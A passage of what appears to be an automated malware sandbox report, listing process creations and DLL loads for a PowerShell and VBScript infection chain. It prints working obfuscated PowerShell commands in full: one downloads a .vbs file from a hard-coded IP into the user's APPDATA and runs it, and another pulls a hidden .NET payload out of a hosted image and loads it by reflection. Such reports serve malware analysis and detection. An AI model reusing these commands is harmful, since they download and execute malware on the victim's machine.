ICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5djzgayy\5djzgayy.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEC91.tmp" "c:\Users\user\AppData\Local\Temp\5djzgayy\CSC760185DBFBB46BF8363AB3E3456F7D3.TMP"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule

Source: C:\Windows\System32\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll
